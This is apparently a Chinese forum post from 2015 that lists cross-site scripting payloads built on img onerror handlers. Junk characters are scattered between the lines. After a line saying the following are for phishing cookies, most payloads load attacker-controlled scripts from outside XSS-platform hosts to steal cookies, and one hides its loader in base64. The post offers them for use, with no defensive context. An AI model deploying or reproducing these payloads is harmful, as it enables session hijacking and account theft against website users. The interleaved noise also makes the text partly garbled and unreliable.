<img src='non-exist.jpg'onerror="alert('xss')">
/ ? ]% W; v2 p2 v/ X l# L X: o<img src=# onerror=alert(123)>
9 }; j5 q7 B1 X u<img src=# onerror=alert(document.cookie)>+ D! O; ]" C. x$ E' \
下面是利用平台钓cookie的
0 T5 e3 G+ M( A3 m <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>! H+ W" V1 _/ \; z
8 L3 A. J5 m* _* R( d
7 j) M; _! W7 T f) {$ G' _9 M
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
7 P# b" G, `$ L<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>7 M7 `! M, V) N j& W+ M1 i
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>9 U4 x1 n ^$ m, l
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
4 r) C2 }" P6 H2 b' W# B9 h3 Z2 a<img src="#">
' V( ~: z) D9 E1 I! Q<img src="#">
- ]; s! ]. t4 J* x<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘># Y0 N" X- h; J8 E8 l$ W
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
* Z, A. K+ C( [( f( `' A<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
4 X* R8 g9 ~3 `<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)> I8 K" y. ^0 c& p0 y
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>4 Y, h2 Q& N$ [; B9 T& y5 o
<img src=x width="0" height="0"></img>
! @. F- p3 w) y<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
5 c/ S! s4 p0 a<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>' a8 J) w& A5 ]8 z% | ~2 M
|
发表于 2015-10-18 14:33:54
收藏
支持
反对